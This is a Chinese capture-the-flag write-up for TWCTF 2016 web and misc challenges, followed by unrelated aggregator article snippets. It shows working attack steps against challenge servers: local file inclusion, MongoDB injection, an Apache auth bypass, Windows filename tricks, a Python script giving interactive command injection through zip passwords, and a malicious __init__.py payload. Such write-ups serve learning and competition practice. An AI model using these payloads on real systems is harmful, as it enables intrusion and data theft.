weixin_30292745
weixin_30292745

参加 Tokyo Westerns / MMA CTF 2nd 2016 经验与感悟 TWCTF 2016 WriteUp

洒家近期参加了 Tokyo Westerns / MMA CTF 2nd 2016(TWCTF) 比赛,不得不说国际赛的玩法比国内赛更有玩头,有的题给洒家一种一看就知道怎么做,但是做出来还需要洒家拍一下脑瓜的感觉。总之很多题还是很有趣的,适合研究学习一番。

以下是洒家做出来的几道小题,类型仅限Web和Misc,给各位看官参考。

关于:

T3JpZ2luYWwgQXJ0aWNsZTogd3d3LmNuYmxvZ3MuY29tL2dvMmJlZC8

Global Page

Web Warmup
Welcome to TokyoWesterns' CTF! 
http://globalpage.chal.ctf.westerns.tokyo/
 
这题用中文浏览器点进去一看,出现了: 
Warning: include(tokyo/zh-CN.php): failed to open stream: No such file or directory in /var/www/globalpage/index.php on line 41
Warning: include(): Failed opening 'ctf/zh-CN.php' for inclusion (include_path='.:/usr/share/php:/usr/share/pear') in /var/www/globalpage/index.php on line 41
显然是HTTP Request Header 的 Accept-Language: zh-CN,zh;q=0.8,en;q=0.6 部分的本地文件包含漏洞。
 flag在/flag.php。有两个子目录,/ctf 和 /tokyo,可以列目录。
  参加 Tokyo Westerns / MMA CTF 2nd 2016 经验与感悟 TWCTF 2016 WriteUp_第1张图片

这就说明 http://globalpage.chal.ctf.westerns.tokyo/?page=ctf 中$_GET['page'] 代表目录,Accept-Language中的语言代表目录下的文件名部分。

直接访问/flag.php 和 用 /?page=ctf  Accept-Language: ../flag 并没有输出。

进一步探测:  /?page=to.k/yo 仍然正常显示,说明$_GET['page']删除了 .  / 符号,并自动在末尾添加 / 。

经过一番尝试,洒家突然发现报错信息里面include()路径开始部分并没有其他东西,那么就可以使用php://协议读取源码。

参加 Tokyo Westerns / MMA CTF 2nd 2016 经验与感悟 TWCTF 2016 WriteUp_第2张图片

base64解码即可。

同样的方法,当然可以读取index.php 的源码

php
ini_set('display_errors', 1);
include "flag.php";
?>




<span style="color:#0000ff;">Global</span> Page




php
$dir = "";
if(isset($_GET['page'])) {
    $dir = str_replace(['.', '/'], '', $_GET['page']);
}

if(empty($dir)) {
?>

php
}
else {
    foreach(explode(",", $_SERVER['HTTP_ACCEPT_LANGUAGE']) as $lang) {
        $l = trim(explode(";", $lang)[0]);
?>
$l==='he')?" class=rtl":""?>>
php
        include "$dir/$l.php";
?>


php
    }
}
?>

 

 

Problem

Today, our 3-disk NAS has failed. Please recover flag.
deadnas.7z

Hint 1: The NAS used RAID.
Hint 2: RAID-5

 
这一题给了3个磁盘镜像。Disk0 和Disk2 都是512K,而Disk1只剩一句话: 
crashed :-(
刚开始没有正确理解题意,洒家以为Disk1完全没有用,因为Disk0和Disk2不一样,认为Disk0和Disk2两个磁盘组成了Raid0之类的东西。直接把两个镜像合并到一起恢复数据无果。后来给了两个Hint,RAID-5,洒家瞬间明白了有3个磁盘,Disk1坏了所以没有显示(衰)
下面推出知名国产软件DiskGenius。正确做法如下:
参加 Tokyo Westerns / MMA CTF 2nd 2016 经验与感悟 TWCTF 2016 WriteUp_第3张图片

洒家一开始尝试了多种RAID-5类型和块大小,后来发现瞎JB试也不行,直接十六进制查看器看数据块在多小尺度上有明显边界。

如下图所示,3FF0 到 4000 之间有明显边界,说明块大小最大为0x4000 / 1024 = 16K。一开始洒家尝试的512K是明显错误的。而最终的块大小为512B,这一点当然可能也可以从16进制编辑器中看出来。

  参加 Tokyo Westerns / MMA CTF 2nd 2016 经验与感悟 TWCTF 2016 WriteUp_第4张图片

洒家最后贴张flag:

参加 Tokyo Westerns / MMA CTF 2nd 2016 经验与感悟 TWCTF 2016 WriteUp_第5张图片

 

 

Get the admin password!

Web

Problem

Get the admin password!
http://gap.chal.ctf.westerns.tokyo/

You can use test:test

 
 这个各种SQL注入没有一点反应,洒家又考虑文件包含,又试了XPath等等各种姿势,无果。突然想到会不会是MongoDB?
 
参加 Tokyo Westerns / MMA CTF 2nd 2016 经验与感悟 TWCTF 2016 WriteUp_第6张图片

哟呵,还真是MongoDB。

需要密码,那就用个二分法。代码太丑洒家就不贴了,效果如图:

参加 Tokyo Westerns / MMA CTF 2nd 2016 经验与感悟 TWCTF 2016 WriteUp_第7张图片

Poems

Web

Problem

Read the first poem.

http://poems.chal.ctf.westerns.tokyo

poems.7z

Server: Ubuntu 16.04 + Apache2

Hint1:(2016-09-04 11:05 UTC)

  • Password cracking is unnecessary.

Hint2:(2016-09-04 17:02 UTC)

  • You can access to admin page without user id or password.

这题很有趣,在没放hint的时候就做出来了,洒家感到贼开心。主要用到了Apache的htpasswd绕过,URL重写等。一开始洒家找到了一个任意文件(除了最关键的list.txt)读取漏洞,后来发现完全走了弯路。

题目给了源码,又是喜闻乐见的Slim框架。主要后端逻辑在/src/routes.php。

主要的保存用户发送的Poem逻辑是:

发送的name和poem被json_encode() 储存在/poems/data/中,文件名为随机的16进制的文件中。文件名集中储存在/poems/list.txt。题目目标是读取第一篇Poem。由于文件名不可预知,必须先读取list.txt。

另外含有 /admin,PHP代码中没有任何防护 ,但是实际访问的时候要求密码。这是在Apache中设置的。

 参加 Tokyo Westerns / MMA CTF 2nd 2016 经验与感悟 TWCTF 2016 WriteUp_第8张图片

check_poem_id()保证了无法通过 GET /poems?p=../list.txt 读取 list.txt。然而上图中除了check_poem_id()并没有对 $poem_id进行其他的检验,因此可以读取任意其他文件(不能是json格式,否则会被当作poem文件解析显示):

读取 /etc/passwd

参加 Tokyo Westerns / MMA CTF 2nd 2016 经验与感悟 TWCTF 2016 WriteUp_第9张图片

想到上文所述/admin密码问题,读取/etc/apache2/sites-enabled/000-default.conf

参加 Tokyo Westerns / MMA CTF 2nd 2016 经验与感悟 TWCTF 2016 WriteUp_第10张图片

读取 /etc/apache2/htpasswd ,admin密码是MD5加盐的,尝试破解了很长时间最终也是难度太高破解失败。

参加 Tokyo Westerns / MMA CTF 2nd 2016 经验与感悟 TWCTF 2016 WriteUp_第11张图片

洒家这是开始考虑绕过/admin 的密码。

思考一番后,突然想到.htaccess URL重写,豁然开朗。

RewriteCond %{REQUEST_FILENAME} !-f
RewriteRule ^ index.php [QSA,L]

之间洒家直接访问 /index.php/admin, 即可达到访问 /admin 的效果,同时绕过Apache的密码

参加 Tokyo Westerns / MMA CTF 2nd 2016 经验与感悟 TWCTF 2016 WriteUp_第12张图片

出现flag:

参加 Tokyo Westerns / MMA CTF 2nd 2016 经验与感悟 TWCTF 2016 WriteUp_第13张图片

 

最后看来,这道题源码中显而易见的任意文件读取漏洞的发展方向是无底洞,让洒家走了不少弯路,最终的解法竟然这么简单。

 

 

Rotten Uploader

Web

Problem

Find the secret file.

http://rup.chal.ctf.westerns.tokyo/

Hint1 (2016/09/04 16:31)

  • The files/directories on the DOCUMENT_ROOT are below four.
    • download.php
    • file_list.php
    • index.php
    • uploads(directory)
  • The number of files in the DOCUMENT_ROOT/uploads is 5. The directory have "index.html".
  • You don't need scan tools.

这一题文件给的清清楚楚,显然/uploads/里面有个文件名无法预知的文件包含flag。download.php 可以下载任意文件(除了file_list.php)。那么就下载一堆东西:

download.php

php
header("Content-Type: application/octet-stream");
if(stripos($_GET['f'], 'file_list') !== FALSE) die();
readfile('uploads/' . $_GET['f']); // safe_dir is enabled. 
?>

第三行大小写不敏感地过滤,无法下载包含'file_list'的文件。

读取index.php,发现flag文件的文件名就在file_list.php中。index.php显示了3个文件: test.cpp,test.c,test.rb。

代码非常简单,貌似坚不可摧。洒家尝试了一番无果。等等,大小写不敏感,为什么要用stripos()?

参加 Tokyo Westerns / MMA CTF 2nd 2016 经验与感悟 TWCTF 2016 WriteUp_第14张图片

大小写真的不敏感。原来是个Windows系统。坚不可摧的代码还是有漏洞。

洒家使用兼容MS-DOS的8.3短文件名绕过。

参加 Tokyo Westerns / MMA CTF 2nd 2016 经验与感悟 TWCTF 2016 WriteUp_第15张图片

答案就很明显了。

参加 Tokyo Westerns / MMA CTF 2nd 2016 经验与感悟 TWCTF 2016 WriteUp_第16张图片

 2016年9月18日更新

洒家看老外的Writeup,发现了一种奇技淫巧的解法:

GET /download.php?f=F< HTTP/1.1

这样可以直接下载f/F开头无扩展名的文件。

实验发现,在Windows系统中, < 符号可以代替扩展名的一部分,如果没有扩展名(没有 . )就可以代替全部。

例如此目录下有 index.php

D:\www\test>type "index<"
系统找不到指定的文件。

D:\www\test>type "index<"
系统找不到指定的文件。

D:\www\test>type "index.<"
php
readfile('./FL<');

D:\www\test>type "index.p<"
php
readfile('./FL<');

D:\www\test>type "index.php<"
php
readfile('./FL<');

D:\www\test>type "index.php<<<"
php
readfile('./FL<');

然而网上搜不到关于这个的玩法。真是奇技淫巧。

glance

Misc

Problem

I saw this through a gap of the door on a train.

 

洒家看见这题就乐了,题目挺有想法的。直接MATLAB提取所有图片帧,然后洒家的做法是写个HTML放满标签(懒得再编程了)

 参加 Tokyo Westerns / MMA CTF 2nd 2016 经验与感悟 TWCTF 2016 WriteUp_第17张图片

 

———————————— 

2016年9月16日更新:洒家忙了一阵子乱七八糟的东西,继续研究没做出来的题目

ZIP Cracker

Web Misc

Problem

here is useful tool for hackers!

http://zipcracker.chal.ctf.westerns.tokyo/

这一题洒家一看就是命令注入,然而搞了半天也没有注入成功。看了老外的Writeup(https://gist.github.com/baronpig/f6f2a4db993e951cde9ee92db15fc953  ,https://blog.0daylabs.com/2016/09/05/command-injection-zip-bruteforce/)才豁然开朗:当勾选use unzip时,fcrackzip-1.0猜测的可能的压缩密码才参与命令注入。洒家一直尝试的是把命令注入的恶意代码放到字典里,然而大概fcrackzip-1.0的原理并不是一个一个暴力破解,恶意代码不被猜测为可能的密码就不会发生命令注入。

洒家犯的第二个错误是,index.php 存在源码泄露(.index.php.swp)(好吧,说好的不用扫描器)。洒家是Google了返回的字符串(Possible password: paSSw0rd ()  和 Password Found ! pw ==p@ssw0rd)才意识到这不是用unzip暴力破解,而是用了fcrackzip-1.0。

洒家走的一个弯路是:洒家在文件名上做了很多文章,然而命令用的是 tmp_name,此处并不能注入。

用vim recovery .index.php.swp之后,主要部分的代码如下:

php
if(!empty($_FILES['zip']['tmp_name']) and !empty($_FILES['dict']['tmp_name'])) {
    if(max($_FILES['zip']['size'], $_FILES['dict']['size']) <= 1024*1024) {
        // Do you remember 430387 ?
        $zip = $_FILES['zip']['tmp_name'];
        $dict = $_FILES['dict']['tmp_name'];

        $option = "-D -p $dict";
        if(isset($_POST['unzip'])) {
            $option = "-u ".$option;
        }

        $cmd = "timeout 3 ./fcrackzip-1.0/fcrackzip $option $zip";
        $res = shell_exec($cmd);
    }
    else {
        $res = 'file is too large.';
    }
}
else {
    $res = 'file is missing';
}
?>

上文提到的韩国博客中找到了fcrackzip 的源码:

// main.c
int REGPARAM
check_unzip (const char *pw)
{
  char buff[1024];
  int status;

  sprintf (buff, "unzip -qqtP \"%s\" %s " DEVNULL, pw, file_path[0]);
  status = system (buff);

#undef REDIR

  if (status == EXIT_SUCCESS)
    {
      printf("\n\nPASSWORD FOUND!!!!: pw == %s\n", pw);
      exit (EXIT_SUCCESS);
    }

  return !status;
}

可见漏洞发生在对 fcrackzip 使用 -u 参数时,fcrackzip 会调用 unzip 验证可能的密码,验证时直接拼接shell命令字符串造成命令注入。

由此洒家构造一个密码为  ";ls;echo" 的 zip文件,勾选unzip 结果为:

参加 Tokyo Westerns / MMA CTF 2nd 2016 经验与感悟 TWCTF 2016 WriteUp_第18张图片

第一个unzip 缺少了文件名参数所以显示了错误信息。

那么搞一个密码为  ";cat flag.php;# 的zip,结果如下

 参加 Tokyo Westerns / MMA CTF 2nd 2016 经验与感悟 TWCTF 2016 WriteUp_第19张图片

得到flag: TWCTF{20-bug-430387-cannot-deal-files-with-special-chars.patch:escape_pw}

 对了,前面PHP源码提到的430387指的是 https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=430387;msg=19 

Debian Bug report logs - #430387
[PATCH] `fcrackzip --use-unzip' cannot deal with file names containing a single quote

 洒家改了改 https://blog.0daylabs.com/2016/09/05/command-injection-zip-bruteforce/ 中的脚本,做了个“终端”:

参加 Tokyo Westerns / MMA CTF 2nd 2016 经验与感悟 TWCTF 2016 WriteUp_第20张图片

import requests
import json
import subprocess
import os
import re

def delTmpFiles():
    try:
        os.remove('zipped.zip')
        os.remove('dict.txt')
    except OSError:
        pass

def postCmd(cmd):
    password = '";'+cmd+';#' # password of zip file
    zipfilename = 'zipfile.zip' #the zip name that gets posted
    dictfilename = 'dictionary.txt' #the dict name that gets posted
    dictfilecontents = """password1\npassword12\npassword123\n"""+password+"""\n1\n""" #dictionary file contents
    unzip = True
    #print password
    #print dictfilecontents
    #password = 'password1'
    #zips the random.txt file with password into zipped.zip
    subprocess.call(['zip', '--password', password, 'zipped.zip', 'random.txt','-q'])

    dictfile = open('dict.txt', 'wb')
    dictfile.write(dictfilecontents)
    dictfile.close()

    url = "http://zipcracker.chal.ctf.westerns.tokyo/"
    multiple_files = [
        ('zip', (zipfilename, open('zipped.zip', 'rb'), 'application/x-zip-compressed')),
        ('dict', (dictfilename, open('dict.txt', 'rb'), 'text/plain'))
    ]

    data = {}
    if unzip:
        data['unzip'] = 'on'
    r = requests.post(url, files=multiple_files, data=data)
    #print r.text
    return r.text
def getOutput(html):
    pattern = re.compile(r'if archive file newer\s*(.*?)\s*PASSWORD FOUND!!!!: pw',re.S)
    result = pattern.findall(html)
    if len(result) == 1:
        return result[0]
    else:
        print 'fail. Original html: '
        print html
        return ''

def main():
    with open('random.txt','wb') as f:
        f.write('abcdefg')
    cmd = raw_input('>>> ')
    while cmd != '':        
        print getOutput(postCmd(cmd))
        delTmpFiles()
        cmd = raw_input('>>> ')
    os.remove('random.txt')

if __name__ == '__main__':
    main()

 

Tsurai Web

 2016年9月18日更新:洒家忙了一阵子乱七八糟的东西,继续研究没做出来的题目

本题参考资料: https://blog.0daylabs.com/2016/09/05/code-execution-python-import-mmactf-300/

Web

Problem

http://tweb.chal.ctf.westerns.tokyo/
Mirror: http://tweb2.chal.ctf.westerns.tokyo/

tweb.7z

一道Python Flask的题目,洒家对Flask无感,还是硬着头皮看了看。研究了一番,程序的流程大致如下:
注册
密码文件 passwd
每一行的格式 abcd:5d6894c77ab618eedca1feace0ee073b
abcd 是用户名,合法用户名规则是 \A[0-9a-zA-Z]{,20}\Z
后面的Hash是 md5(随机密码 + 盐)。一行一个用户名,存放在 /passwd 文件中。
创建/data/(md5(用户名)).py 文件,创建 /data/(md5(用户名)) 文件夹。
登录
和上文中的 passwd 文件中的对应行对照。
访问/
未登录:返回默认template。
已登录:  config = __import__(h(session.get('username'))) # built-in function __import__; 读取 md5(session username).py 文件 
上传
/data/(md5(用户名)).py 用作 文件列表,例如上传两张照片后,内容为:
  imgs = [u'%[email protected]', u'%[email protected]'] 
文件不会自动改名。

漏洞成因

洒家研究了半天也没发现漏洞,直到看了老外的博客才恍然大悟:

__import__ 函数的顺序问题。

如果 有 /aabb/__init__.py 和 /aabb.py, __import__('aabb') 会优先去搜索并包含前者。

因此上传 一个 __init__.py (前端验证限制文件类型,轻松绕过)到 md5(用户名) 目录,当

config = __import__(h(session.get('username')))

时就会执行任意Python命令。由于 import 时需要 imgs 列表,老外的做法是:

x = __import__("subprocess")
imgs = []
imgs.append(x.check_output('cat flag', shell=True))

当然洒家也可以这样搞:

imgs = []
fflag = open('flag','rb').read()
imgs.append(fflag)

效果是只剩下一张图片,文件名就是flag。

参加 Tokyo Westerns / MMA CTF 2nd 2016 经验与感悟 TWCTF 2016 WriteUp_第21张图片

 

 

 

转载于:https://www.cnblogs.com/go2bed/p/5841682.html

你可能感兴趣的:(参加 Tokyo Westerns / MMA CTF 2nd 2016 经验与感悟 TWCTF 2016 WriteUp)

  • 排名前三的避孕套 啵啵_2374
    袁宁坪国贸19720194019732TOP1:durex/杜蕾斯杜蕾斯可以说是避孕套的代名词,它引领了世界乳胶避孕套的发展,销售额世界第一,占全球避孕套20%以上的市场份额。和传统国产避孕套相比,拥有压倒性的品质优势。杜蕾斯产品风格平实,在中国销售的产品均为天然乳胶材质。与新型聚氨酯材质相比,天然乳胶使用历史长,技术成熟,更为传统可靠,在弹性、贴合性方面都表现理想,只是有厚度瓶颈,技术上很难做到
  • 赵磊:对于目标管理,这四个认知很重要 团队引导者赵磊
    最近几个项目,都和目标管理有关。有的是老板希望管理层能对组织目标形成统一认识;有的是决策层发现,团队成员对目标的管理与追踪做的不好;还有的团队负责人觉得,虽然现在取胜主要依赖于战略的成功,但要保持可持续发展,管理层要在目标管理上下功夫。我发现,这些组织虽然面临的情境与挑战不同,但管理团队在目标管理中,有几个方面的认知却颇有相似之处:1.管理者目标与公司目标的关系认知很多公司的目标是自上而下分解的。
  • 关爱学生视力,呵护健康成长 泥步修行A
    关爱学生视力,呵护健康成长眼睛是心灵的窗户,它是感知五彩缤纷大千世界的窗口,拥有一双明亮的眼睛才能更好的学习、生活与工作。时有家长以自己的孩子近视看不到黑板为由,要求班主任把孩子的座位调前一点;也时有家长抱怨“孩子书没读好,可把眼睛给搞坏了。”是的,学生视力低下率越来越明显,严重威胁着青少年的健康成长。小学生视力不良的原因,除极个别属于遗传因素外,大多数都是因不注意用眼卫生所致。主要因素如下:一是
  • Hive SQL查询汇总分析 大数据深度洞察 Hivehivesqlhadoop数据仓库数据库大数据
    目录SQL查询汇总分析成绩查询查询编号为“02”的课程的总成绩查询参加考试的学生个数分组查询查询各科成绩最高和最低的分查询每门课程有多少学生参加了考试(有考试成绩)查询男生、女生人数分组结果的条件查询平均成绩大于60分的学生的学号和平均成绩查询至少选修四门课程的学生学号查询同姓(假设每个学生姓名的第一个字为姓)的学生名单并统计同姓人数大于2的姓查询每门课程的平均成绩,结果按平均成绩升序排序,平均成
  • 【架构设计模式-1】代理模式 W Y 代理模式系统安全安全
    什么情况下用上代理模式?远程对象访问当需要访问位于不同地址空间的远程对象时,比如在分布式系统中。代理可以隐藏网络通信的复杂性,让客户端感觉就像在本地访问对象一样。例如,一个企业级应用中,不同部门的系统可能分布在不同的服务器上。当部门A的系统需要调用部门B系统中的某个服务时,可以使用代理模式。代理对象负责与远程服务进行通信,将请求发送到远程服务器并接收响应,然后将结果返回给本地客户端。这样,部门A的
  • 班主任不是那么好当的 云知道mqx
    从毕业到学校的那天起,就开始想当班主任。教理化的想当班主任。如果自己不去争取,好像学校就不会考虑。因为几乎都是数学,语文首当其冲。到现在也是物理化学的少之又少。刚刚毕业那会儿,年轻,没有经验,隔了两年,又结婚。生小孩。辅导小孩上学。这个想法就靠边站,一直等到孩子去上大学,闲暇无聊,又开始有这个想法。已经45岁了,再不当,真的是有心无力了。那就着手吧,告之领导,领导嫌弃年龄大,而且没有经验。给你个差
  • Pytorch维度转换操作:view,reshape,permute,flatten函数详解 ghx3110 深度学习笔记pytorch维度转换操作
    引言Pytorch中常见的维度转换函数有view,reshape,permute,flatten。本文将详细介绍这几个函数的作用与使用方式,并给出了具体的代码示例,希望能够帮助大家。常见的维度有四维:比如(batch,channel,height,width);三维:比如(b,n,c);二维:比如(h,w)。下面介绍如何使用上述函数进行维度之间的转换。1.view函数作用tensor.view()
  • centos7安装pyenv与pip来管理不同python环境 心软且酷丶 pythonlinuxpythonvirtualenv
    概述:pyenv是一个Python版本管理工具,它能够进行全局的Python版本切换,也可以为单个项目提供对应的Python版本。使用pyenv后,可以在服务器上安装多个不同的Python版本,也可以安装不同的Python实现,不同Python版本之间的切换也非常简单。pyenv安装:1、安装git工具[root@devops~]#yuminstallgit2、安装pyenv首先把项目从githu
  • 《馅饼?陷阱?》 柳浪柳浪
    《馅饼?陷阱?》:当今中国社会已进入老龄化,据报道60岁以上的老人已达2.6亿。这样庞大的群体自然是保健品公司重点工作对象。眼下流行的推销方式大体程序分为三步:第一,宣传为60岁以上老人免费送礼品;第二,聚会发放礼品时登记个人信息,宣传组织廉价旅游;第三,在兴高采烈地旅游中,联络感情、推销产品。近日,本人参加了一个冬虫夏草保健品公司组织的河北徐水大午温泉旅游活动。原本1298元的三日游,参与者只需
  • 2018-07-31 泰娥
    图片发自App下面介绍一种合于道的运化能量的坐禅方法,总共分两个阶段修习:第一阶段第一步:选一静室,盘膝而坐,单盘、双盘、散盘皆可,如果不能盘坐,即可坐在椅子上。全身放松,头正、脊柱要直,双臂自然下垂,双手放在大腿部位,掌心向上。第二步:深呼吸两分钟以上,所谓吐故纳新。第三步:轻轻的想象全身与大自然融为一体,冥想五分钟以上。
  • 2023-05-23 暖暖de严严
    中原焦点团队第33期中级班学员坚持分享第459天总约练136次来访者95观察员37咨询师4回顾昨天一天与孩子的相处中我发现了自己的问题,学了很多的知识,但是没有吸收到大脑,形成记忆,经验,技能。跟孩子的交流中,我常常会说,某某老师说,我在直播间听到等等,还会经常冒出许多的专业名词,这让孩子有些反感、排斥。她想听的只是我说的故事,可我发现自己每天学习看书,根本不会输出,说出来的都是心灵鸡汤,一大堆的
  • 《我不可能只是仰望着你》 赵石花
    麦克莱恩是美国著名战地记者,几乎当时所有的战争都报道过,而她最广为人知的身份却是海明威第三任妻子、还有《丧钟为谁而鸣》中女主人的原型。不输于好莱坞女星的美貌常常让人忽略了她的才华与勇气,读着她和海明威的故事,更像是作者本人和自己的一场战争。最后,她离了婚,虽然感情令人心碎,但相较于事业,她还是不希望屈居人下,就像书名说的,不可能永远仰望着你。“至少我拿回了属于我自己的名字”她说。
  • BUUCTF 2021-10-4 Pwn Ch1lkat BUUCTFPwnlinuxpwn
    文章目录保持手感echo分析EXPPwnme1分析EXPwdb_2018_1st_babyheap分析EXPFSOPhouseoforange_hitcon_2016分析前置知识House_of_orangeFSOPEXPzctf_2016_note3分析EXPgyctf_2020_document分析EXP动态调试复现护网杯_gettingstart分析EXPpicoctf_2018_buffe
  • C# 关于多线程同步不同实现方式 語衣 C#知识补充c#开发语言
    栏目总目录AutoResetEventclassMainClass{//thearrayofconsumerthreadsprivatestaticListconsumers=newList();//thetaskqueueprivatestaticQueuetasks=newQueue();//thesynchronisationobjectforlockingthetaskqueuepriva
  • 随遇而安(二) 菲芃老葛
    随遇而安(二)人生就是不断的学习与使用的过程。也是不断的积蓄与消费的过程。也是不断的接触新资源排除无用资源的过程。也是迎来送往吐故纳新的过程。天气也一样,积聚了好几天的闷热,今早的暴雨下得那是一个彻底。倾盆,如注,伴着近在耳边的炸雷还有远方的轰隆轰隆的绵延不绝。虽然是说有一点点让胆小的人害怕,但真的挺过瘾。爆发一下咯。压抑着真不大好。这几天有几个人的离去真的毫无征兆,挺可惜的。世事好无常。一个是我
  • OpenCV结构分析与形状描述符(14)拟合直线函数fitLine()的使用 jndingxin OpenCVopencv人工智能计算机视觉
    操作系统:ubuntu22.04OpenCV版本:OpenCV4.9IDE:VisualStudioCode编程语言:C++11算法描述拟合一条直线到2D或3D点集。fitLine函数通过最小化∑iρ(ri)\sum_i\rho(r_i)∑iρ(ri)来拟合一条直线到2D或3D点集,其中rir_iri是第i个点到直线的距离,而ρ(r)\rho(r)ρ(r)是一个距离函数,可以是以下之一:DIST_
  • 一半,一半 百合花的微笑
    水满了,再加,会溢。人累了,再撑,会垮。活着,就是一种幸福,别把自己逼得太紧,总要留些时间与空间给自己。人生,一半糊涂,一半明白;生活,一半回忆,一半继续;家庭,一半包容,一半责任;感情,一半经营,一半珍惜;夫妻,一半容忍,一半体贴;孩子,一半天赋,一半培养;父母,一半孝顺,一半陪伴;朋友,一半走动,一半真诚。人生无悔,就是完整;生活愉快,就是圆满!
  • 马克 米勒维尼《动量大师 超级交易员圆桌访谈录》阅读笔记59 小二菜园
    问题59:你在分析中是否使用利润率或净资产收益率(ROE)?马克·米勒维尼:是的。我喜欢看到不断扩大的利润率。有时,这可能是一个公司业绩改善但销售为负背后的催化剂。但就像我说的,没有销售收入,你只能在一段时间内提高收益。净资产收益率是你应该用来比较你的股票与同一行业其他股票的东西,一般来说,更好的股票会有15-17%或更高的净资产收益率。大卫·瑞恩:它们都是值得关注的指标,也是我进一步研究公司盈利
  • Git使用经验总结6-删除远端历史记录 charlee44 Gitgit
    删除远端的历史记录但是不影响最新的仓库内容是笔者一直想实现的功能,有两个很不错的用处:有的历史提交不慎包含了比较敏感的信息,提交的时候没注意,过了一段时间才发现。这个时候已经有了很多新的历史提交,无法再回退了。有时候会拿Git仓库存储代码文件以外的内容,比如美术资源、依赖库等等。这时除了少数提交大部分历史提交是没意义的,还很占仓库空间。不过要说明的是Git删除历史记录跟我们想象中的不太一样,需要使
  • 记20181023冷水浴第二十三天 禾禾木木
    早上5点58分起床,可能是因为月经期,整个人都不想动,腰总是酸痛酸痛的,总想懒在床上。但我知道,我多懒一分钟在床,等一下在赶时间送小孩时就多一分后悔。想到这,立马起床,抓紧时间做早餐,做完早餐6点20分,就开始冷水浴。因为还是经期,我开了冷水与温水之间的温度,这天对身体按摩的幅度减少了,脚对脚之间的按摩的力量也不敢太用力,因为一用力,感觉生殖器有点隐隐作痛,所以冲水的时间也缩短了,做了20分钟。虽
  • 基于深度学习的信号滤波:创新技术与应用挑战 逼子歌 深度学习神经网络信号滤波图像去噪卷积神经网络长短期记忆网络
    一、引言1.1研究背景随着科技的不断发展,信号处理领域面临着越来越复杂的挑战。在众多信号处理技术中,基于深度学习的信号滤波技术逐渐崭露头角,成为研究的热点。基于深度学习的信号滤波在信号处理领域具有至关重要的地位。如今,我们生活在一个数据爆炸的时代,各种信号源不断产生大量的复杂数据。例如,在通信领域,信号常常受到噪声干扰,传统的滤波方法在处理复杂、非线性信号时可能效果不佳。而深度学习技术具有自动特征
  • 音频文件格式转换怎么做? 不见的命运
    音乐在生活当中是必不可少的,很多人都喜欢听音乐。音频文件的格式有很多种,想要进行转换的话也不复杂,用迅捷视频转换器就可以转换音频文件的多种格式。新纪元和浪漫主义有很多相似之处。音乐史上每一种新的风格,都是在时髦与反时髦的斗争中形成的。就像稳健的古典主义是对轻巧的洛可可风格的反叛;感情至上的浪漫主义又是对崇尚形式的古典主义的反叛一样,新纪元音乐是轻音乐领域里的后现代主义思潮对传统审美观念的反叛。所不
  • 爷爷的情,奶奶的星 江苏阿康
    每当到了有星星的夜晚,我常常会仰望星空,用心地去寻觅,把自己的心放飞到遥远的过去。小时候,没有现在的风扇和空调,到了夏天,爷爷便会把自己编制的蒲扇赏给我们每人一把。到了晚上,我常常会拿着蒲扇跑出去玩,有时候很晚才能够回来。每次在我晚回来的时候,爸爸妈妈都进屋睡觉了,而爷爷总是还躺在庭院中的蒲席上等我。于是,我不去吵醒爸妈,就在爷爷的旁边躺下来,与爷爷一起纳凉。爷爷见我回来了,他便没有了一丝睡意,他
  • 京东特价版1分购是真的吗?一分购怎么弄? 高省爱氧惠
    京东平台也已推出了一个特价版的玩法,特价版平台上面的产品价格是比较优惠的,一些朋友听说有一个一分购的活动,想要确认一下这个京东特价版1分购是真的吗?值得相信吗?购物、汽车加油、看电影、点外卖、用氧惠APP!更优惠!氧惠(全网优惠上氧惠)——是与以往完全不同的抖客+淘客app!2023全新模式,我的直推也会放到你下面,送1:1超级补贴(邀请好友自购多少,你就推广得多少,非常厉害),欢迎各位团队长体验
  • 积鼎科技携手潍柴动力的喷嘴雾化模拟项目荣获2024年数字仿真卓越应用奖 积鼎科技-多相流在线 科技流体仿真CFDVirtualFlow多相流CAE
    近日,积鼎科技携手潍柴动力股份有限公司(以下简称“潍柴动力”),凭借创新的喷嘴雾化一体化模拟仿真项目,其成果价值赢得了行业专家的一致认可,成功荣获2024年度数字仿真科技奖卓越应用奖。潍柴动力作为中国内燃机行业的领军企业,在动力系统、商用车、农业装备及智慧物流等领域具有广泛的影响力。此次与积鼎科技的深度合作,不仅是对其技术创新能力的一次验证,也是双方在推动行业技术进步、实现可持续发展目标上的重要里
  • 怎么购买外卖优惠券?美团抢优惠券的技巧 氧惠好项目
    购买外卖优惠券的方法有多种,以下是其中几种常见的方式:领购物大额优惠券、赚返利佣金用氧惠~氧惠APP(带货领导者)——是与以往完全不同的抖客+淘客app!2023全新模式,我的直推也会放到你下面。主打:带货高补贴,深受各位带货团队长喜爱(每天出单带货几十万单)氧惠是公认的返利最好用的软件。注册即可享受高补贴+0撸+捡漏等带货新体验。氧惠邀请码888999,送万元推广大礼包,教你如何1年做到百万团队
  • 最大熵模型(Maximum entropy model) Fang Suk 机器学习最大熵模型最大熵最大熵原理指数族分布
    最大熵模型(Maximumentropymodel)本文你将知道:什么是最大熵原理,最大熵模型最大熵模型的推导(约束最优化问题求解)最大熵模型的含义与优缺点1最大熵原理最大熵原理:在满足已知约束条件的模型集合中,选择熵最大的模型。熵最大,对应着随机性最大。最大熵首先要满足已知事实,对于其他未知的情况,不做任何的假设,认为他们是等可能性的,此时随机性最大。2最大熵模型最大熵原理是统计学习的一般原理,
  • 和文案杀手创始人的,线下见面会 文案杀手嫡传弟子尚尚
    ❥8万高阶弟子密训+营销盈利宝典,你想不想知道?诺,我来深圳马上一周了,这一周里,我办了两件大事!!!一、参加了线下商业课,盈利思维私享课二、见了我的3分钟入百万的师父,没错(就是文案杀手创始人)除此之外,还有我的师兄妹,就是你仰望的大咖,一起相互交流干货探讨……脑袋里装的都是知识!!!还有我的亲师父,单次线上咨询9800+,你想想,一通电话1个小时算,两天按一天8小时……现在按一下你的计算器,啧
  • 班级小事 百草丰茂
    班级里今天发生了哪些小事呢?我们一起来看看:一、朱欣怡同学今天早晨上课时间未到校,打电话与家长联系后,家长将其送到学校。但家长与孩子都对迟到原因闭口不谈。二、教室里的桌凳摆放比较整齐,但教室里的垃圾到处都是,孩子们没有主动捡拾的习惯,让他们捡的时候甚至会说这不是他们弄脏的,坐在旁边也不会动手收拾一下。我们要建立一套可操作可执行的清洁方案,解决教室脏乱差的情况。三、今天我们班在国旗下进行了演讲,演讲
  • 反观自身 不断自我提升 浪飘飘
